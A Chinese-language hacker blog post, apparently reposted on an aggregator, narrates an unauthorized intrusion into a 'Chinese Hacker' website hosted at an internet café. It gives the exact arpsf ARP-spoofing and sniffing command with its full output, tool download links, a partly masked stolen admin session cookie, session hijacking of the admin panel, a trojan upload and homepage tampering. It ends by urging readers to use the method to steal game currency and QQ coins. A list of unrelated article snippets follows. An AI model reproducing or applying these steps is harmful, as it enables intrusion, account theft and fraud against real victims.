Arp欺骗截cookies入侵“中国黑客”网站(图)

放假回家,暂时没有自己的电脑,只能跑网吧。打开ie就看见网吧主页。。。这个网吧是我家附近作的最好的。在这里玩过几次,也提醒过老板一些漏洞。不过漏洞天天更新么~ 

是个2级域名111.lzbiz.com。换成www,竟然是个黑客网站。。。名字叫做“中国黑客”哈。。。看来这里有黑客罩着。偶看看能不能挑战下~~ 


(图1) 

首叶的系统必须要知道密码才可以进去。再看看别的系统。Oblog1.0古老阿。。。害得我找了N长时间他自带的EWEBEDITOR的默认密码,都没有找到。只是这个版本有注入,拿到管理员密码登陆。晕。。。脚本错误。。。看来是程序问题。 

网吧后台因为我上次帮他检测过,他把登陆地址换了。猜,是猜不到的。我记得这个系统上次进去后可以直接上传asp的。但是需要session验证。站点和网吧的首叶是同一个ip的。从外网看,是网吧的ip。应该是路由上映射出去的。所以不能确定是不是同一台主机。既然是同个网吧,我就想到了arp欺骗。所以必须确认是哪一台服务器。刚好有个asp探针在服务器上。地址是aspcheck.asp, 


(图2) 

 192.168.0.251 

修改host文件,把www.lzbiz.com和网吧主页,都指向到这个内部ip。浏览正常。说明这两个站都在同一个服务器上。这次有了目标了。Arp欺骗。可以弄到他对外发的信息,和外面向他发的信息。既然是服务器,那应该没有人在上面。所以,我主要想嗅探到对他80,21的数据。可能的结果是一些密码,后台登陆地址,ftp密码,等等。。。反正他网站总要维护的。 

先看看是否满足条件。在网吧搞这个,最好不要太嚣张,毕竟被网管看见了不好。所以先把cmd的背景颜色改成白色。 


(图3) 

C:/Documents and Settings/user>color f7 

这个不止用一次的,后面需要不断的查看cmd窗口,被人家看见了,就知道肯定不干好事。。。好了。下载一些工具。 

地址:http://cnxhacker.net/download/show/1474.html 

Arp cheat and sniffer V2.1 

执行wpcapinstall.exe在dos下安静安装winpcap。没有这个程序执行会出错。说明一下实际的情况。因为网吧有几百机子,每台打开ie首叶就是这个网吧首叶。而网吧首叶刚好和那个站同一个机子。所以信息量很大,需要慢慢排除。工作量也就很大了。 

执行命令。 

arpsf -cheatsniff -t 192.168.0.251 -g 192.168.0.253 -sniffpacket -p TCP -sp 80,21 -o d:/siff.txt -w 0 -m 100 

他的ip是192.168.0.251,网关是192.168.0.253,嗅探源端口80.21。 

  

************************可爱的分割线*********************** 

C:/arp2>arpsf -cheatsniff -t 192.168.0.251 -g 192.168.0.253 -sniffpacket -p TCP 

-sp 80,25,23,110 -o d:/siff.txt -w 0 -m 100 

  

====================================================== 

  

Arp Cheat And Sniffer V2.1 

powered by shadow @2005/6/15 

my web:http://www.codehome.6600.0rg 

  

====================================================== 

  

+Choose a method to get adapter list: 

->0.Get By Winpcap Driver! 

->1.Get By IpHelpAPI (Can use this in 2003)! 

Please input your choose num:1 

  

+Adapater List: 

  

Try to get adapter list by iphelpapi... 

  

---------------------------------------------------- 

0:/Device/NPF_{ACB13381-0E41-4EC2-86E9-CC6B4F8F821C} 

  

Please choose a adapter with num:0 

  

>>This is user define: 

Protocol:  [TCP] 

Source IP: [192.168.0.251     ]         Source Port: [80,25,23,110] 

Dest   IP: [*                 ]         Dest   Port: [*] 

Sniff SMTP:     [false] 

Sniff POP:      [false] 

Sniff FTP:      [false] 

Sniff Telnet:   [false] 

Sniff POST:     [false] 

Sniff PACKET:   [true] 

Sniff Filter:   [true] 

Sniff Way:      [si<->di] 

Sniff Mode:     [high] 

Sniff TimeOut:  [120] seconds 

Save File Path: [d:/siff.txt] 

Max  File Len : [100] M 

Save File Mode: [ASC] 

Try to get Mac of       [ 192.168.0.251 ] 

This IP’s MAc is:       [ 000aeb22b5f4 ] 

+OK:获取目标mac地址成功! 

Try to get Mac of       [ 192.168.0.253 ] 

  

-Can not get mac by netbios -_- 

-Try to use ping to get mac... 

  

Pinging 192.168.0.253 with 32 bytes of data: 

  

Reply from 192.168.0.253: bytes=32 time<1ms TTL=64 

Reply from 192.168.0.253: bytes=32 time<1ms TTL=64 

Reply from 192.168.0.253: bytes=32 time<1ms TTL=64 

Reply from 192.168.0.253: bytes=32 time<1ms TTL=64 

  

Ping statistics for 192.168.0.253: 

    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 

Approximate round trip times in milli-seconds: 

    Minimum = 0ms, Maximum = 0ms, Average = 0ms 

  

+ping ok done... 

  

This IP’s MAc is:       [ 0007e91bded5 ] 

+OK:获取网关mac地址成功! 

Try to get Mac of       [ 192.168.0.126 ] 

This IP’s MAc is:       [ 000aeb22a806 ] 

+OK:获取自身mac地址成功! 

Try to set static ip mac table... 

  

+Ok 

  

-->开始欺骗第一个目标主机... 

欺骗源ip: 192.168.0.253         欺骗源mac: 000aeb22a806 

受骗主机: 192.168.0.251         受骗的mac: 000aeb22b5f4 

... 

-->开始欺骗第二个目标主机... 

欺骗源ip: 192.168.0.251         欺骗源mac: 000aeb22a806 

受骗主机: 192.168.0.253         受骗的mac: 0007e91bded5 

... 

<--双向欺骗完成 

  

+Cheat ok,start sniff... 

Press any key to stop :) 

  

TCP 192.168.0.251    80    -->  221.13.130.50    1703   1460 Bytes 2006-1-20 9:2 

2:42 

------------------------------------------------------ 

  

TCP 192.168.0.251    80    -->  221.13.130.50    1703   1460 Bytes 2006-1-20 9:2 

2:43 

------------------------------------------------------ 

  

TCP 192.168.0.251    80    -->  221.13.130.50    1703   1460 Bytes 2006-1-20 9:2 

2:43 

------------------------------------------------------ 

  

TCP 192.168.0.251    80    -->  221.13.130.50    1703   1460 Bytes 2006-1-20 9:2 

2:44 

------------------------------------------------------ 

************************可爱的分割线*********************** 

屏幕上都是如上流动的数据。直到文件大于100m的时候自动删除,然后再生成。  

+Choose a method to get adapter list: 

->0.Get By Winpcap Driver! 

->1.Get By IpHelpAPI (Can use this in 2003)! 

这里选1,我的系统是xp。前一个选项时使用Winpcap,来驱动,我这里出错了,所以使用1的选项。 

0:/Device/NPF_{ACB13381-0E41-4EC2-86E9-CC6B4F8F821C} 

Please choose a adapter with num:0 

这里选0,其他的信息自动出现。  

可别认为数据小。。。五分钟时间,就10兆了。。。剪切出来(程序会自动再生成),打开,搜索pass,搜索admin,找到有用的,记录下来,然后再清理数据。如此重复。。。一上午过去了。。。终于截到了管理员登陆后台的密码和cookies值。 


(图4) 

********************可爱的分割线***************** 

Cookie: __utma=209638473.866599531.1137740948.1137748682.1137748860.3; __utmb=209638473; __utmz=209638473.1137740948.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDSAQDCSBB=HHEO*************************; __utmc=209638473 


********************可爱的分割线***************** 

这个可是比密码管用多了,密码16位md5,还要破半天。有了这个东西,就直接打开manage.asp了,也不用找他的登陆叶面登陆。 

Webtool 4.0桂林老兵的作品。 

地址:http://cnxhacker.net/download/show/1199.html 

自定义cookies为截获的内容,然后get后台叶面manage.asp。 

剩下的就是上传木马了。这个服务器安全比较差,虽然lzbiz的ftp用户根目录不可见,但是他有asp探针啊!直接输入到根目录。就可以改首叶了。没有写权限,可惜ftp密码和blog密码一样,用户名在serv_u目录里找到了。登陆,修改。 

入侵这个站,有一点比较让人郁闷就是,他的系统虽然大都是老板本,里面有oblog1.0,尘缘雅境3.0,音乐系统,bbs,等等。。。全都是老的版本。。。漏洞一堆,都可以拿到密码,但是就是不能找到真正有用的后台。而所知道的后台却把登陆叶面隐藏了。麻烦了一天时间才搞定。管理员根据这篇文章,采取下安全措施吧。 

这种方法,可以用于网吧盗取网管的重值游戏币,q币帐号。  

如果把arp欺骗的目标定为网吧收帐的机子,目的端口为80,然后再去巴台要求重值游戏币,一定很好玩的。。。不过不要说是我教你们的哦. 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://xiahunao.cn/news/1620571.html

如若内容造成侵权/违法违规/事实不符,请联系瞎胡闹网进行投诉反馈,一经查实,立即删除!

相关文章

目标URL存在跨站漏洞

URL存在跨站漏洞 &#x1f696;漏洞复现&#x1f696;漏洞描述&#x1f696;解决方法&#x1f696;对于开发&#x1f696;对于安全操作&#x1f696;对于质量保证 &#x1f696;漏洞复现 记录学习中遇到的问题 该页面存在反射型XSS payload citynull&accountnull&pa…

我的第一次真实对国外某购物平台web漏洞挖掘

&#xff08;真实世界&#xff09;我的第一次真实对国外某购物平台web漏洞挖掘 开放重定向 - 低危XSS - 低危 这两组合起来就完全不一样一点的&#xff0c;个人觉得比原本高一些 危害&#xff1a;窃取用户敏感数据、用户cookie、钓鱼操作 等… 前言 这是我第一次&#xff…

对某代刷网站的渗透测试

0x01 今天闲来无事&#xff0c;在网上冲浪看帖&#xff0c;看到有个人发了一个代刷网站链接&#xff0c;出于好奇就点进去看了下&#xff0c;一看&#xff0c;好家伙&#xff0c;业务还挺多啊。可惜都要钱&#xff0c;咱可没钱&#xff01; 0x02 然后便想看看有没有办法白嫖&…

基于JavaFx的ThinkPHP漏洞扫描工具---RexHa(Aazhen)的一些说明

文章目录 吹水环节一、工具的功能&#xff08;新旧版本对比&#xff09;二、工具的使用与操作2.1 工具新旧版展示2.2 漏洞单个扫描验证功能展示2.2.1 Thinkphp-2.x rce--&#x1f44c;&#x1f3fb;2.2.2 ThinkPHP-5.0.23-RCE--&#x1f44c;&#x1f3fb;2.2.3 ThinkPHP5.0.x-…

渗透测试中真实IP

发现了一篇两年前的好文章&#xff0c;转载给大家看看&#xff0c;方便自己以后查阅。 CDN简介 CDN的全称是Content Delivery Network&#xff0c;即内容分发网络。其基本思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节&#xff0c;使内容传输的更快、更…

常见的安全测试漏洞

一、SQL注入攻击 SQL 注入攻击主要是由于程序员在开发过程中没有对客户端所传输到服务器端的参数进行严格的安全检查&#xff0c;同时 SQL 语句的执行引用了该参数&#xff0c;并且 SQL 语句采用字符串拼接的方式执行时&#xff0c;攻击者将可能在参数中插入恶意的 SQL 查询语…

检测到目标URL存在http host头攻击漏洞,修复方案:在Web服务器防止Host头攻击

一、前言 漏洞描述&#xff1a;为了方便的获得网站域名&#xff0c;开发人员一般依赖于HTTP Host header。例如&#xff0c;在php里用_SERVER[“HTTP_HOST”]。但是这个header是不可信赖的&#xff0c;如果应用程序没有对host header值进行处理&#xff0c;就有可能造成恶意代…

一次简单的渗透测试,快来测测P站有没有漏洞吧!

前言 下午闲来无事&#xff0c;拿自己站玩玩&#xff0c;也算是一次比较完备地漏洞挖掘。文末插入福利 信息搜集 在fofa上找到一个后台的站。 一个普通的后台&#xff0c;弱口令&#xff0c;sql注入没打进去。 从错误路由中得知框架是tp的 这个版本是存在RCE漏洞的 直接嗦…

Git企业开发控制理论和实操-从入门到深入(五)|标签管理

前言 那么这里博主先安利一些干货满满的专栏了&#xff01; 首先是博主的高质量博客的汇总&#xff0c;这个专栏里面的博客&#xff0c;都是博主最最用心写的一部分&#xff0c;干货满满&#xff0c;希望对大家有帮助。 高质量博客汇总 然后就是博主最近最花时间的一个专栏…

如何使用腾讯云服务器搭建网站?

使用腾讯云服务器搭建网站全流程&#xff0c;包括轻量应用服务器和云服务器CVM建站教程&#xff0c;轻量可以使用应用镜像一键建站&#xff0c;云服务器CVM可以通过安装宝塔面板的方式来搭建网站&#xff0c;腾讯云服务器网分享使用腾讯云服务器建站教程&#xff0c;新手站长搭…

iOS swift5 扫描二维码

文章目录 1.生成二维码图片2.扫描二维码&#xff08;含上下扫描动画&#xff09;2.1 记得在info.plist中添加相机权限描述 1.生成二维码图片 import UIKit import CoreImagefunc generateQRCode(from string: String) -> UIImage? {let data string.data(using: String.En…

使用windeployqt和InstallShield打包发布Qt软件的流程

前言 Qt编译之后需要打包发布&#xff0c;并且发布给用户后需要增加一个安装软件&#xff0c;通过安装软件可以实现Qt软件的安装&#xff1b;用于安装软件的软件有很多&#xff0c;这里主要介绍InstallShield使用的流程&#xff1b; 使用windeployqt打包Qt编译后的程序 Qt程序…

【论文笔记】最近看的时空数据挖掘综述整理8.27

Deep Learning for Spatio-Temporal Data Mining: A Survey 被引用次数&#xff1a;392 [Submitted on 11 Jun 2019 (v1), last revised 24 Jun 2019 (this version, v2)] 主要内容&#xff1a; 该论文是一篇关于深度学习在时空数据挖掘中的应用的综述。论文首先介绍了时空数…

有了二建证,对工资有多大提升?华通教育双十二建造师课程优惠来袭!

一开始每个月多1500工资&#xff0c; 现在算&#xff0c;差不多一个月多4000工资。 给大家分享一下考证之后带来的收益。文中妹子&#xff0c;刚毕业1500多的实习工资&#xff0c;考证后4000。 二建呢&#xff0c;其实它的作用是让你有机会进入工程行业&#xff0c;算是一块敲…

亿华通冲刺港股:年营收超6亿 业绩受申龙客车和中植汽车拖累

雷递网 雷建平 1月31日报道 北京亿华通科技股份有限公司&#xff08;简称&#xff1a;“亿华通”&#xff09;日前递交招股书&#xff0c;准备在香港上市。 亿华通是2020年8月在科创板上市&#xff0c;发行价为76.65元&#xff0c;发行17,630,523股&#xff0c;募集资金13.5亿元…

哈焊华通深交所上市:市值43亿 机械总院集团为大股东

雷递网 雷建平 3月22日报道 焊所华通&#xff08;常州&#xff09;焊业股份有限公司&#xff08;简称&#xff1a;“哈焊华通”&#xff0c;证券代码&#xff1a;301137&#xff09;今日在深交所上市。 哈焊华通本次发行4545.34万股&#xff0c;发行价为15.37元&#xff0c;募资…

世纪华通2020年业绩持续领先:商业模式愈发成熟,优秀质地突出

撰稿 | 多客 来源 | 贝多财经 过去一年&#xff0c;"宅经济"效应持续发酵&#xff0c;不仅让游戏公司的营收大幅度提升&#xff0c;也让众多资本开始青睐一些优质游戏公司的标的。 根InvestGame透露&#xff0c;游戏业2021年第一季度的并购交易和投融资金额就已经超…

第二届828 B2B企业节启动,华为云携手上万伙伴共筑企业应用一站购平台

当前&#xff0c;数字技术与实体经济深度融合&#xff0c;为千行百业注入新动力、拓展新空间。数据显示&#xff0c;2022年中国数字经济规模超过50万亿&#xff0c;占GDP比重超过40%&#xff0c;继续保持在10%的高位增长速度&#xff0c;成为稳定经济增长的关键动力。 为加速企…

[杂谈]10年前的杂志文章-清凉简装,电脑减负非诚勿扰

《清凉简装 电脑减负非诚勿扰》-这是《电脑爱好者》2010年14期的封面文章&#xff0c;也是我在各个平台昵称的由来&#xff0c;当年那本杂志早就卖废纸了。知网找到了原文&#xff0c;重温一下&#xff0c;十年弹指一挥间&#xff0c;当年的顶配机型现在看个B站估计都够呛&…

周易卦爻解读笔记——井卦

第四十八卦井 水风井 坎上巽下 井卦由泰卦所变&#xff0c;泰卦六五与初九换位&#xff0c;象征建设民生。 地天泰 井卦是困卦的覆卦&#xff0c;序卦传【困乎上者必反下&#xff0c;故受之以井】 井卦是改革三部曲第一卦&#xff0c;后面的革、鼎也都是言谈改革。 井&…